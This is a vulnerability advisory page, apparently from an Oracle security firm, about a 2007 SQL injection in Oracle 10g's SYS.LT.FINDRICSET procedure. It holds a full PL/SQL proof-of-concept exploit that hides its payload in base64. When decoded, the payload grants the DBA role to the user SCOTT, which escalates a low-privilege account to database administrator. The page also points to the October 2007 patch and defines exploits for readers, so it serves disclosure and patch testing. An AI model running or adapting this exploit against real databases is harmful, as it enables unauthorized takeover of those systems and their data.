SQL Injection via Oracle LT.FINDRICSET in Oracle 10g

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Name	SQL Injection via Oracle LT.FINDRICSET in Oracle 10g
Systems Affected	Oracle 10g
Severity	High Risk
Category	SQL Injection
Vendor URL	http://www.oracle.com/
Credit Exploit	Alexandr "Sh2kerr" Polyakov
Exploit	milw0rm
Date	26 Oct 2007 (V 1.00)

Details

The following proof of concept exploit code injects a cursor into sys.lt.findricset and grants the DBA permission to the user SCOTT. This exploit is working on Oracle 10g.

Example

DECLARE
c2gya2Vy NUMBER;
BEGIN
  c2gya2Vy := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UV

Cc7Y29tbWl0O2VuZDs=','WE8ISO8859P1', UTL_ENCODE.BASE64),0);
  SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF');
END;

Patch Information
Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update October 2007.

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.